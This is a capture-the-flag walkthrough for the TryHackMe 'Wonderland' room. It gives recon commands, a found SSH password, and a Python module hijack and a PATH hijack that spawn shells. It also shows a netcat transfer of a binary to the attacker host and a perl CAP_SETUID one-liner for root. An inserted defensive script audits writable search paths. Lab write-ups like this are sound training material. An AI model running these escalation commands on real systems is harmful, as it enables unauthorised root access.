Wonderland

Room Link: https://tryhackme.com/room/wonderland

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

I can see in the browser that I'm on the right track

Kali

gobuster dir -u http://$VICTIM/r/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u http://$VICTIM/r/a -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

After a few letters I was able to just guess the word it's spelling out

TCP/22 - SSH

Kali

ssh alice@$VICTIM
Pass: HowDothTheLittleCrocodileImproveHisShiningTail

Lateral Movement - Abusing the Python Library Path

Victim

sudo -l
cat /home/alice/walrus_and_the_carpenter.py

The first command below prints the order in which Python searches for modules. The first entry it tries is the current directory, so we can create a random.py script of our own there with anything we want in it, and it will be imported instead of the real one.

Victim

python3 -c 'import sys; print(sys.path)'
locate random.py

Victim

echo 'import os' > random.py
echo 'os.system("/bin/bash")' >> random.py
cat random.py

Victim

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Lateral Movement - Abusing $PATH

Kali(receiving)

nc -l -p 1234 > teaParty

Victim(sending)

nc -w 3 $KALI 1234 < teaParty

Ghidra

I opened the file in Ghidra and can see that the program runs the date command, whose output we see when we run the binary. Note that date isn't called with its full path, so if we add another directory to our PATH we can run our own date command instead.

I added /tmp to my PATH

Victim(rabbit)

echo $PATH
export PATH=/tmp:$PATH
echo $PATH

I'm not the hatter

Victim(rabbit)

cd /tmp
echo '#!/bin/bash' > date
echo '/bin/bash' >> date
chmod +x date
cat date
/home/rabbit/teaParty
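Both hops above are the same bug seen twice: a name is resolved along an ordered search path (sys.path for random.py, PATH for date) and a directory the low-privileged user can write to is consulted before the real copy. The audit helper below is an added example, not code from the room or this writeup; the `shadow_risk` function and its `exists`/`is_writable` hooks are my own names, chosen so the lookup logic can be checked without touching the real filesystem.

```python
"""Added audit helper (not part of the room or this writeup): report search-path
entries an unprivileged user can write to that are consulted before the real
copy of a module or binary is reached. Covers sys.path (random.py) and PATH (date)."""
import os
import stat
import sys
from typing import Callable, List, Optional, Tuple


def world_writable(directory: str) -> bool:
    """True if the directory exists and has the 'others' write bit set (e.g. /tmp)."""
    try:
        return bool(os.stat(directory).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def shadow_risk(name: str, search_path: List[str],
                exists: Callable[[str], bool] = os.path.isfile,
                is_writable: Callable[[str], bool] = world_writable
                ) -> Tuple[Optional[str], List[str]]:
    """Walk search_path in order, exactly as the interpreter or shell does.
    Returns (legit_dir, risky_dirs): legit_dir is the first entry that holds
    `name` (None if it is never found); risky_dirs are the writable entries
    consulted before it. Any entry in risky_dirs wins the lookup if a file
    named `name` is planted there, so a non-empty list is a finding."""
    risky: List[str] = []
    for entry in search_path:
        if exists(os.path.join(entry, name)):
            return entry, risky
        if is_writable(entry):
            risky.append(entry)
    return None, risky


def audit_module(module_file: str) -> Tuple[Optional[str], List[str]]:
    """Live check of this interpreter's sys.path ('' means the cwd). Mitigation:
    run trusted scripts with `python3 -I` so the script dir/cwd is not prepended."""
    return shadow_risk(module_file, [p or os.getcwd() for p in sys.path])


def audit_binary(binary: str) -> Tuple[Optional[str], List[str]]:
    """Live check of $PATH for a command a privileged program calls by bare name.
    Mitigation: call it by absolute path (e.g. /bin/date) or reset PATH first."""
    return shadow_risk(binary, os.environ.get("PATH", "").split(os.pathsep))


if __name__ == "__main__":
    for label, (legit, risky) in (("random.py", audit_module("random.py")),
                                  ("date", audit_binary("date"))):
        print(f"{label}: real copy in {legit}; writable dirs before it: {risky}")
```

Run as root on a host where sudo rules or SUID binaries invoke scripts, with PATH/sys.path set as those programs would see them, to spot writable directories ahead of the real module or binary.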

Privilege Escalation

Victim(hatter)

We can just follow what's under Capabilities on GTFOBins, but only the last command, since CAP_SETUID is already set on perl.

Exploit: https://gtfobins.github.io/gtfobins/perl/

getcap -r / 2>/dev/null
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
